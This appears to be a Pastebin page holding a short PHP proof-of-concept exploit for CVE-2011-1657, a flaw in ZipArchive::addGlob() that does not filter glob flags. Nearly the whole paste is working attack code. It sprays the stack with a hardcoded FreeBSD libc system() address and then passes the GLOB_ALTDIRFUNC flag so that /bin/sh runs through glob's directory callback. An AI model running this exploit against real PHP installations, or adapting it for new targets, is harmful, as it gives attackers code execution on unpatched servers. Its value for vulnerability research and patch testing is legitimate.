Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /* CVE-2011-1657: php <= 3.5.6 ZipArchive::addGlob() missing glob flags filtering
- *
- * Lame and JustForFun FreeBSD PoC using GLOB_ALTDIRFUNC glob() flag to pown!
- *
- * (c) 2011 - Clement LECIGNE <clemun at gmail dot com>
- */
- /* Create a file for our md5_file() stack spray.
- */
- $system_addr = "\x50\x78\x8d\x28"; /* FreeBSD 8.2-RELASE system() libc addr */
- $own = fopen("owned", "w");
- fwrite($own, str_repeat($system_addr, 4096/4));
- fclose($own);
- /* Fake zip, empty file is a valid zip.
- */
- $path = "foo.zip";
- unlink($path);
- fopen($path, "a");
- $nx=new ZipArchive();
- $nx->open($path);
- /* Lame stack spraying \o/
- */
- md5_file("owned");
- /* Bing. globbuf.gl_opendir() = system()
- */
- $nx->addGlob("/bin/sh", 64);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement